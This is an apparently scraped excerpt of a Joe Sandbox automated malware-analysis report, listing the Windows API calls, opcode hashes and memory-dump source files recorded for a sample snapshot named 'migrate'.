                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 400815659-0
                                                                                                                                                                                                    • Opcode ID: e93fb17f822ab71ac233ccded3b8f0440868d8a7d8e3182a7683ef17265bd89b
                                                                                                                                                                                                    • Instruction ID: fd76f8bcb413cceb375f4bb722f09f6d8e509228a2ea76287ed02a20b80ea8c4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e93fb17f822ab71ac233ccded3b8f0440868d8a7d8e3182a7683ef17265bd89b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86E02B3360AF4241E66133793C4262F06248FA1338F260216FA14D70C3DF20C80384A2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadStringW.USER32(001113B6,?,00151098,001113B6), ref: 0011E678
                                                                                                                                                                                                    • LoadStringW.USER32(001113B6,?,00151098), ref: 0011E68F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LoadString
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2948472770-0
                                                                                                                                                                                                    • Opcode ID: 49fa3af5e30a44f73f10076ea73cd43746058b8398370b9aa8372e5d6181b226
                                                                                                                                                                                                    • Instruction ID: 5d050e93dd4e0e4418347b5cda341cc787b01117ce4c901e8356765ddfb519e9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49fa3af5e30a44f73f10076ea73cd43746058b8398370b9aa8372e5d6181b226
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ACF0FE75100258FBCF121F61EC04DEB7F69EF19391B404425FE5899120D33289E0EBA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0011A325,?,?,?,0011A175,?,00000001,00000000,?,?), ref: 0011A501
                                                                                                                                                                                                      • Part of subcall function 0011BB03: _wcslen.LIBCMT ref: 0011BB27
                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0011A325,?,?,?,0011A175,?,00000001,00000000,?,?), ref: 0011A532
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AttributesFile$_wcslen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2673547680-0
                                                                                                                                                                                                    • Opcode ID: 7ad44b160d13f742e4fddf403ade4576136a1e9648ecd4e92e57b6ed1331e329
                                                                                                                                                                                                    • Instruction ID: 19784199ff3b698ed51f8621b7894cd8d12a81e9e6cae53ce102f3c702a94b4c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ad44b160d13f742e4fddf403ade4576136a1e9648ecd4e92e57b6ed1331e329
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4F0E5312041097BDF015F60DC41FDA3B6DAF14385F448460B844D6160DB31CAD8DB10
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DeleteFileW.KERNELBASE(000000FF,?,?,0011977F,?,?,001195CF,?,?,?,?,?,00142641,000000FF), ref: 0011A1F1
                                                                                                                                                                                                      • Part of subcall function 0011BB03: _wcslen.LIBCMT ref: 0011BB27
                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0011977F,?,?,001195CF,?,?,?,?,?,00142641), ref: 0011A21F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DeleteFile$_wcslen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2643169976-0
                                                                                                                                                                                                    • Opcode ID: d9252c1764bbc2fc8985c4efa089d56ba162f62d6678e6977ebcd19d87e0a16e
                                                                                                                                                                                                    • Instruction ID: 2603477558b55cb493f3750da854fadd266d14baf7cfd0c94a63b94d63422b38
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9252c1764bbc2fc8985c4efa089d56ba162f62d6678e6977ebcd19d87e0a16e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8E0D8351412196BDB115F60EC45FDA37ACAF1C3C1F484031B944D2060EB71DED4DA50
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GdiplusShutdown.GDIPLUS(?,?,?,?,00142641,000000FF), ref: 0012ACB0
                                                                                                                                                                                                    • CoUninitialize.COMBASE(?,?,?,?,00142641,000000FF), ref: 0012ACB5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: GdiplusShutdownUninitialize
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3856339756-0
                                                                                                                                                                                                    • Opcode ID: 0ce3fafd1657fe9bc2a0689918c700b40d1c76f6cbc86bb804b646538a710aaf
                                                                                                                                                                                                    • Instruction ID: dadfee95ce8a5d614d60fabf6e26cc9ab5ea24465e27f35b397bc16669775bfd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ce3fafd1657fe9bc2a0689918c700b40d1c76f6cbc86bb804b646538a710aaf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79E06572504650EFC7019B58DC06B45FBA9FB48B20F004265F416D3B70CB746880CA94
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,0011A23A,?,0011755C,?,?,?,?), ref: 0011A254
                                                                                                                                                                                                      • Part of subcall function 0011BB03: _wcslen.LIBCMT ref: 0011BB27
                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0011A23A,?,0011755C,?,?,?,?), ref: 0011A280
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AttributesFile$_wcslen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2673547680-0
                                                                                                                                                                                                    • Opcode ID: 70421442e4c8bb5fc6720208a2aea71b9c848928bbe75e4fb1c6c669b27aa6d7
                                                                                                                                                                                                    • Instruction ID: 5118baef0ad21ea1a02d53c2dd6af00479c0da2623a97907f7da2166243974f7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70421442e4c8bb5fc6720208a2aea71b9c848928bbe75e4fb1c6c669b27aa6d7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ACE092355001245BCB11EB64EC05BD97BE8AB193E1F044271FD54E31E0D770DEC4CAA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0012DEEC
                                                                                                                                                                                                      • Part of subcall function 00114092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001140A5
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(00000065,?), ref: 0012DF03
                                                                                                                                                                                                      • Part of subcall function 0012B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0012B579
                                                                                                                                                                                                      • Part of subcall function 0012B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0012B58A
                                                                                                                                                                                                      • Part of subcall function 0012B568: IsDialogMessageW.USER32(000801EA,?), ref: 0012B59E
                                                                                                                                                                                                      • Part of subcall function 0012B568: TranslateMessage.USER32(?), ref: 0012B5AC
                                                                                                                                                                                                      • Part of subcall function 0012B568: DispatchMessageW.USER32(?), ref: 0012B5B6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2718869927-0
                                                                                                                                                                                                    • Opcode ID: fd894765a990cdf1bfdda7ccd1c57c887611c6a8eaabccaa27690589f742af22
                                                                                                                                                                                                    • Instruction ID: d971374dc2859810261a516eb764ba95e10d2791599fae6a9e3a5e84bb96ab5a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd894765a990cdf1bfdda7ccd1c57c887611c6a8eaabccaa27690589f742af22
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CEE09B7540435866DF01A761EC06FDE37AC5B15785F440451B644EA0A2DB78E6A08771
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00120836
                                                                                                                                                                                                    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0011F2D8,Crypt32.dll,00000000,0011F35C,?,?,0011F33E,?,?,?), ref: 00120858
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DirectoryLibraryLoadSystem
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1175261203-0
                                                                                                                                                                                                    • Opcode ID: a4ebf6ead1a73fd40c57eaac708e97c191524143d9d07ccf561893290aa76b38
                                                                                                                                                                                                    • Instruction ID: fa5295be7e069d025c2039888cbb597f94d2d8ca7a01af3c8daba249004cf565
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4ebf6ead1a73fd40c57eaac708e97c191524143d9d07ccf561893290aa76b38
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6E01A768001286ADB11ABA4AC49FDA7BACAF19391F040165B649E2014DB74DAD58AA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0012A3DA
                                                                                                                                                                                                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0012A3E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: BitmapCreateFromGdipStream
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1918208029-0
                                                                                                                                                                                                    • Opcode ID: 8cc7e0d66f2a17e862242269f3bf1dc4b824453f6c2824b441a230c2308134c0
                                                                                                                                                                                                    • Instruction ID: 28bc0d52b10252d6b7b4229b27a18edc221b2325ad5cec1968daf6ee2743e78a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8cc7e0d66f2a17e862242269f3bf1dc4b824453f6c2824b441a230c2308134c0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27E01271500228EFCB14DF55D54179DBBF8FF15361F10C05AE84697201E374AE14DB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00132BAA
                                                                                                                                                                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00132BB5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1660781231-0
                                                                                                                                                                                                    • Opcode ID: 1edf3a3d23787c5e9abfdf9346d98d0e2e2ba5db80a00d1e7e0a0fb8b7837a51
                                                                                                                                                                                                    • Instruction ID: 4ed056942601ac5696c65bff75ae3ffbf324b02c05bb1e8be44cc8d31665a8f3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1edf3a3d23787c5e9abfdf9346d98d0e2e2ba5db80a00d1e7e0a0fb8b7837a51
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ABD0223915430018EC383EB03803848B385BE62BB3FF0528AF030868C9EF318081A025
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: ItemShowWindow
• String ID:
• API String ID: 3351165006-0
APIs
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
APIs
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: _strlen
• String ID:
• API String ID: 4218353326-0
APIs
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
APIs
• __EH_prolog.LIBCMT ref: 00118289
  • Part of subcall function 001113DC: __EH_prolog.LIBCMT ref: 001113E1
  • Part of subcall function 0011A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0011A598
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: H_prolog$CloseFind
• String ID:
• API String ID: 2506663941-0
APIs
• __EH_prolog.LIBCMT ref: 001113E1
  • Part of subcall function 00115E37: __EH_prolog.LIBCMT ref: 00115E3C
  • Part of subcall function 0011CE40: __EH_prolog.LIBCMT ref: 0011CE45
  • Part of subcall function 0011B505: __EH_prolog.LIBCMT ref: 0011B50A
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
APIs
• __EH_prolog.LIBCMT ref: 001113E1
  • Part of subcall function 00115E37: __EH_prolog.LIBCMT ref: 00115E3C
  • Part of subcall function 0011CE40: __EH_prolog.LIBCMT ref: 0011CE45
  • Part of subcall function 0011B505: __EH_prolog.LIBCMT ref: 0011B50A
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                                                                    • Opcode ID: 4a24e7a9efd8809c6bd62a9d7b0557fa0668860ca3f1be596a995a1af7bab5bf
                                                                                                                                                                                                    • Instruction ID: 2627b9440dd5288a95c2eac557f7abe39d1985f3f1a2f3d9c9e093571c6be76c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a24e7a9efd8809c6bd62a9d7b0557fa0668860ca3f1be596a995a1af7bab5bf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06413BB0905B409EE724DF798885AE6FBE5BF29300F50493ED5FE83282CB316694CB10
                                                                                                                                                                                                    APIs
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: 8fb69434288544d6c6cfacabb1938b724d787bdef473e5f2aa7716247f1b000c
• Instruction ID: a0d507b8b7a57e3fa189e33dd09fa93492c6dec79f812b636bb6d0116b7eb9a1
• Opcode Fuzzy Hash: 8fb69434288544d6c6cfacabb1938b724d787bdef473e5f2aa7716247f1b000c
• Instruction Fuzzy Hash: D521F8B1E40221AFDB149F74EC4166B76ACFB14714F14063AE516EB681D7749A20C7E8
APIs
• __EH_prolog.LIBCMT ref: 0012B098
  • Part of subcall function 001113DC: __EH_prolog.LIBCMT ref: 001113E1
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: c4b6bbb933a6e6d4a5aeea1d03e54eed5a7e0790137a514c97028c8936f9d95c
• Instruction ID: f64e2437fdc5243df6eed7201da7b98fb5ce6397e7b9978041a6240b7650409c
• Opcode Fuzzy Hash: c4b6bbb933a6e6d4a5aeea1d03e54eed5a7e0790137a514c97028c8936f9d95c
• Instruction Fuzzy Hash: D531AD71C04259EECF19DFA4E891AEEBBB4AF18300F1044AEE409B3242D735AE54CB61
APIs
• GetProcAddress.KERNEL32(00000000,?), ref: 0013ACF8
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: AddressProc
• String ID:
• API String ID: 190572456-0
• Opcode ID: acf3a9d2f1493d9003c54f369974cb037b4edd453586b807e8794bbf52bbb5b7
• Instruction ID: b672b09ccd328f0d695f53fd13f58fbc12f2dca0018e45359d78cbe9f7d49971
• Opcode Fuzzy Hash: acf3a9d2f1493d9003c54f369974cb037b4edd453586b807e8794bbf52bbb5b7
• Instruction Fuzzy Hash: C8113637A002255FDF269E68EC4089A7395AFC5331F564220FC95EB654D730EC4187D2
APIs
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: e540f31933036c9ea0f90d4ceb239c816d7532ad58b5943e9e339287492212f7
• Instruction ID: 553126206b4139b12151daf2e007aee483cca8af866eea55c699344806ff2d73
• Opcode Fuzzy Hash: e540f31933036c9ea0f90d4ceb239c816d7532ad58b5943e9e339287492212f7
• Instruction Fuzzy Hash: E801A533900529BBCF19ABA8CC919DEB772BF98750F014135F822B7252DB348D81C6A0
APIs
• GetProcAddress.KERNEL32(00000000,?), ref: 00133C3F
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: AddressProc
• String ID:
• API String ID: 190572456-0
• Opcode ID: 36c1152be9f92bb6ab34067e76b3a556fe4b53d508d20777d231617ec0ef3210
• Instruction ID: d12db6b840400441bee9f892fbe5fc6f06171fbe67a97ec9be2638b0511cc130
• Opcode Fuzzy Hash: 36c1152be9f92bb6ab34067e76b3a556fe4b53d508d20777d231617ec0ef3210
• Instruction Fuzzy Hash: B1F0E536200216DFDF169EA9EC0099A77A9EF05B20B145226FA25E71D0DB31DA60C794
APIs
• RtlAllocateHeap.NTDLL(00000000,?,?,?,00134286,?,0000015D,?,?,?,?,00135762,000000FF,00000000,?,?), ref: 00138E38
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                    • Opcode ID: 57aecad35bf72d1b795d09408a49563549cb8d6e53a0d4cd76c0650563cebe13
                                                                                                                                                                                                    • Instruction ID: c1eca876c521bc061f58f9d614659ffd1a0d9993a9664c91d74b7ebc864458cd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 57aecad35bf72d1b795d09408a49563549cb8d6e53a0d4cd76c0650563cebe13
